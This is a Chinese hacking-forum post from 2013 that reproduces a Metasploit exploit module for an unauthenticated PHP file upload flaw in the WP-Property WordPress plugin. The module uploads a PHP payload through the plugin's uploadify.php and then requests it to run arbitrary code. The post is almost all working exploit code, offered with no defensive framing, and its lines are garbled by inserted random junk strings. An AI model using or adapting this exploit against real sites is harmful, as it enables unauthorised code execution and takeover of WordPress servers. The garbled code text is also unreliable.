找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2290|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞
" x9 T8 n& p% h# v2 J6 B
# w1 Y& C6 l- j$ c2 m3 Q, M) B ## # This file is part of the Metasploit Framework and may be subject to2 b& c) [. I; x) I+ s- Y3 N

; N  y) y9 M$ M  g/ \# redistribution and commercial restrictions. Please see the Metasploit
; c  c1 `. }) z, ]! Z/ }' v
1 n- A. t: K9 g( d5 n# Framework web site for more information on licensing and terms of use.
, k( L* C, U. U( J% ^
) @* l6 y$ r; E' r#   http://metasploit.com/framework/ ##, r" w/ r; Z5 F, V5 W; t

+ y! d* |2 _" @9 M8 j1 \
* n9 @; n6 {* M3 n! L" K1 T/ D* W4 B
* T, O* d) a( q- E; {* H3 J
: \; T; Q: T. b
require 'msf/core'
/ X4 Y$ B) O# ^* m% H" [4 grequire 'msf/core/exploit/php_exe'9 C8 ~3 U. Y3 T

* }  U. {/ E* p9 sclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',: a6 N  j* |6 g0 ^  N
'Description'    => %q{/ ?. l# }2 H: J) G% [3 ~  }
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
0 Z- U: Y  ^# j2 i[' V) p( ~0 n, J' r! p' E6 _5 B" o% B
'Sammy FORGIT', # initial discovery) h% X: O, O! g7 z- R/ T
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
" m1 l, i- B; s6 a  k3 G- F],
& e- r& C8 w6 G' i6 H* f'License'        => MSF_LICENSE,- _  ^9 |$ P/ @" @, Z6 i
'References'     =>6 t( P4 M6 s  w' f
[0 F: |+ n- H8 [& L
[ 'OSVDB', '82656' ],  z, N/ N6 a' q: a
[ 'BID', '53787' ],8 }" Z2 O8 n4 m/ e5 C" V6 O( ~
[ 'EDB', '18987'],/ \% g: U/ @! {
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
2 B+ ], Q; W. a* e* o) c],
( `6 V0 P# }! Z6 o( W  Z'Payload'        =>+ z$ r1 J  O+ d/ c( Q
{$ B; M' y& I: A( F9 ?4 z: `5 z
'BadChars' => "\x00",
: G1 c9 R3 V9 [" @! L},
$ `' q: c3 `. ~5 G'Platform'       => 'php',% C" D7 ?+ p1 T! |) l) i
'Arch'           => ARCH_PHP,
& S0 v8 [2 d3 m4 |! ?1 q8 P6 D% s'Targets'        =>- U6 L2 X! f% O) j7 w4 a5 l
[* o% |& ~/ f" B. k1 G9 |
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],) B5 t) N. {, L
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 \- x* `/ v  _
],
2 ~8 r3 z% T) t# O( E( ]'DefaultTarget'  => 0,
2 D) L$ K8 p' b8 m' j'DisclosureDate' => 'Mar 26 2012'))
4 }; X5 Y/ p  A' z, z( ^
9 t& |7 M/ _, ~0 L5 R! B6 yregister_options(
9 F) b/ M* [3 T' @8 x* Q[
, M$ T2 i1 ]* D$ u7 `, iOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
: e) w& M* K  s: r], self.class)
$ S: k2 N0 ^$ d& z) P: x7 xend
( {8 L! i2 x) \9 Z3 ], U& @& p, U; ~8 j/ x) J" n' w
def check
7 M  Q$ Z$ _  b  l. Wuri =  target_uri.path
1 E/ O( ]7 c- q! [; G+ Y# `4 `uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
" M" C! A% I5 k. n'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
* m. t% Z$ p3 V, l})
9 Q* f, {0 e# g& @/ X! V  m( a8 \6 H  n: A- q. V* W$ H/ b1 c
if not res or res.code != 200
$ U- S* @# d$ Y3 lreturn Exploit::CheckCode::Unknown; ?% C) b: B: N. u! |$ F% D1 U
end
) S$ q% R# y! Q  h) T& ^6 W$ M* k2 D- W. r  v+ F& ]& J
return Exploit::CheckCode::Appears
$ b, g3 a8 S% [- x5 c4 d- @end' C3 {2 v7 e3 \

: s8 B9 U1 E" \2 ]3 gdef exploit' m/ e. m! A9 g1 @8 L1 X
uri =  target_uri.path
9 Y3 m% C- q5 \; E  ~+ Guri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true): e( M  @5 H$ K# B. c3 u

- l3 s% D. C. p+ |* T+ |0 m3 w( Adata = Rex::MIME::Message.new
* D9 d  X+ D% L# k6 A0 c" Qdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")9 }1 Z! m. d4 N# y: Z+ @
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
' W1 k+ i! b! [0 qpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')" u' n' f1 a  F" s4 a- V; }
. T7 x# S3 f" D4 c+ _% `2 F
print_status("#{peer} - Uploading payload #{@payload_name}")
8 p5 \/ ]* e; G- o& Yres = send_request_cgi({
9 ]# }; O  ~* e1 _'method' => 'POST',$ j7 ~. r  v9 U, g# ~
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",# `  l- v% e: y9 X4 C) c$ u
'ctype'  => "multipart/form-data; boundary=#{data.bound}",( n; ]5 E6 d+ j7 i5 {7 Y
'data'   => post_data
3 n+ I0 ~0 }$ T4 n1 Q})( a4 x. {) ]6 K4 q; C

/ {0 o; P% b8 O" Aif not res or res.code != 200 or res.body !~ /#{@payload_name}/% R) t" f; P9 [
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
0 g$ f; W! P0 pend
+ F, J6 \0 d. \8 S( J: r3 @
% T6 v) `" g; u( hupload_uri = res.body! Z3 i4 o' ^- G1 M6 _, T) b- m- Z% v" |  ~
6 U$ y3 A% H& |( q& a: A6 S
print_status("#{peer} - Executing payload #{@payload_name}")
1 ^, P" M4 X) G. x8 l) X9 Wres = send_request_raw({7 D3 T/ \) q/ c. J2 T
'uri'    => upload_uri,% O& n1 [2 x; ]. a1 x* W
'method' => 'GET'# M& e+ |$ ]! z0 r$ m( s
})5 o% V5 C0 J2 W4 X& q, s
end
' m. D! |% d3 m7 w  b0 Qend$ F% A% p+ a% s9 y1 \! n( F1 d$ ?. x

2 X* s/ t9 z- C# T不要问我这写的是什么 怎么利用 我是说msf./ I, Y, h  A1 |; t" {% w

( n5 m: ]8 ?% T- B0 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表